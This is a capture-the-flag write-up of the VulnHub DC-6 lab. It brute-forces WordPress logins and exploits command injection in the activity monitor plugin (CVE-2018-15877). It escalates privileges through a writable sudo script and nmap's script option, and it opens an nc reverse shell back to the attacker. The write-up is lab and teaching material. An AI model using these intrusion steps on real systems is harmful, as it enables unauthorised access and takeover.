DC-6 – Writeup

Details

This machine is https://www.vulnhub.com/entry/dc-6,315/

Recon

First locate the machine

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00022s latency).
MAC Address: 08:00:27:8F:14:CE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00030s latency).
MAC Address: 08:00:27:AF:04:55 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.76 seconds

And services

root@kali:~# nmap -sV -p- 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.00016s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:AF:04:55 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds

Foothold

The instructions say to add it to hosts

root@kali:~# echo "192.168.56.103 wordy" >> /etc/hosts

Off to the site at http://wordy/

Screenshot 1

It's wordpress, that means wpscan time

root@kali:~# wpscan --url http://wordy -e
[SNIP]
[i]  User(s) Identified:
[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] mark
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] graham
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[SNIP]

It found some usernames, so brute force time. Although the creator gave a hint on how to make a smaller wordlist for this one

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Now wpscan it

root@kali:~# wpscan --url http://wordy -e -P ./passwords.txt
[SNIP]
[i] Valid Combinations Found:
 | Username: mark, Password: helpdesk01
[SNIP]

One valid combo of

mark:helpdesk01

Off to the login page at http://wordy/wp-login.php

Screenshot 2

Screenshot 3

I noticed there was an activity monitor plugin, my attention instantly went onto this as the site mentioned plugins, a quick google revealed CVE-2018-15877, to check it would be vulnerable I went to http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

Screenshot 4

So I should be able to inject commands into the ip parameter, so I setup a listener

root@kali:~# nc -nlvp 4444

Then fired up burp, I put 127.0.0.1 into the ip box and hit lookup, then added my command injection via burp

Screenshot 5

When I clicked forward

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 57266

A connection came back

Route to Root

I tested it

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then upgrade it

python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-6:/var/www/html/wp-admin$

Now I knew there was wordpress which could have some useful stuff like DB creds in, but first I dug into users

www-data@dc-6:/var/www/html/wp-admin$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
graham:x:1001:1001:Graham,,,:/home/graham:/bin/bash
mark:x:1002:1002:Mark,,,:/home/mark:/bin/bash
sarah:x:1003:1003:Sarah,,,:/home/sarah:/bin/bash
jens:x:1004:1004:Jens,,,:/home/jens:/bin/bash

I dug into the homes

www-data@dc-6:/var/www/html/wp-admin$ cd /home
www-data@dc-6:/home$ ls -la
drwxr-xr-x  6 root   root   4096 Apr 26 13:30 .
drwxr-xr-x 22 root   root   4096 Apr 24 15:44 ..
drwxr-xr-x  2 graham graham 4096 Apr 26 13:28 graham
drwxr-xr-x  2 jens   jens   4096 Apr 26 13:29 jens
drwxr-xr-x  3 mark   mark   4096 Apr 26 13:28 mark
drwxr-xr-x  2 sarah  sarah  4096 Apr 24 23:07 sarah

Graham had nothing, but in jens

www-data@dc-6:/home/jens$ ls -la
drwxr-xr-x 2 jens jens 4096 Apr 26 13:29 .
drwxr-xr-x 6 root root 4096 Apr 26 13:30 ..
-rw------- 1 jens jens    5 Apr 26 13:29 .bash_history
-rw-r--r-- 1 jens jens  220 Apr 24 23:07 .bash_logout
-rw-r--r-- 1 jens jens 3526 Apr 24 23:07 .bashrc
-rw-r--r-- 1 jens jens  675 Apr 24 23:07 .profile
-rwxrwxr-x 1 jens devs   50 Apr 26 02:19 backups.sh

A backups script

www-data@dc-6:/home/jens$ cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

No use to me now, although of note, it is editable by the devs group, onto marks home

www-data@dc-6:/home/mark$ ls -la
drwxr-xr-x 3 mark mark 4096 Apr 26 13:28 .
drwxr-xr-x 6 root root 4096 Apr 26 13:30 ..
-rw------- 1 mark mark    5 Apr 26 13:28 .bash_history
-rw-r--r-- 1 mark mark  220 Apr 24 23:06 .bash_logout
-rw-r--r-- 1 mark mark 3526 Apr 24 23:06 .bashrc
-rw-r--r-- 1 mark mark  675 Apr 24 23:06 .profile
drwxr-xr-x 2 mark mark 4096 Apr 26 01:56 stuff

A dir to look in

www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls -la
drwxr-xr-x 2 mark mark 4096 Apr 26 01:56 .
drwxr-xr-x 3 mark mark 4096 Apr 26 13:28 ..
-rw-r--r-- 1 mark mark  241 Apr 26 01:53 things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

That's nice, they gave me creds for Graham

graham:GSo7isUM1D4

So I tried them on ssh

root@kali:~# ssh [email protected]
graham@dc-6:~$

Awesome, what can I do now

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

I can run jens backup script as jens, although it does nothing useful. But the devs group can edit it, am I in that?

graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)

Yes, that means I can become jens

graham@dc-6:~$ cd /home/jens
graham@dc-6:/home/jens$ echo "/bin/sh" > ./backups.sh

Now I run it as jens and get a shell

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
$

Check it worked

$ id
uid=1004(jens) gid=1004(jens) groups=1004(jens),1005(devs)

Upgrade the jens shell

$ python -c "import pty;pty.spawn('/bin/bash')"
jens@dc-6:~$

Do I have new powers?

jens@dc-6:~$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

I can run nmap as root, nmap in some versions has a nice inbuilt shell option

jens@dc-6:~$ sudo nmap nmap --interactive
nmap: unrecognized option '--interactive'
See the output of nmap -h for a summary of options.

Not this version, but no worries there are other ways

jens@dc-6:~$ TF=$(mktemp)
jens@dc-6:~$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:~$ sudo nmap --script=$TF
Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 10:41 AEST
NSE: Warning: Loading '/tmp/tmp.cNuQygPgo7' -- the recommended file extension is '.nse'.
#

Now this was a new shell, but it was a bit weird in that it didn't display what you typed although it did execute the commands. This annoyed me so rather than jump straight to the flag I spawned a new reverse shell out of it

root@kali:~# nc -nlvp 6666

Then in the shell that didn't show my input

# nc 192.168.56.101 6666 -e /bin/bash

In my listener

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 35436

A quick upgrade

python -c "import pty;pty.spawn('/bin/bash')"
root@dc-6:/home/jens#

Now it's flag time

root@dc-6:/home/jens# cd /root
root@dc-6:~# ls -la
drwx------  3 root root 4096 Apr 26 13:31 .
drwxr-xr-x 22 root root 4096 Apr 24 15:44 ..
-rw-------  1 root root   16 Apr 26 13:31 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root  438 Apr 24 22:35 .mysql_history
drwxr-xr-x  2 root root 4096 Apr 26 01:58 .nano
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-r--r--  1 root root  541 Apr 26 13:22 theflag.txt
root@dc-6:~# cat theflag.txt
Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"'
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.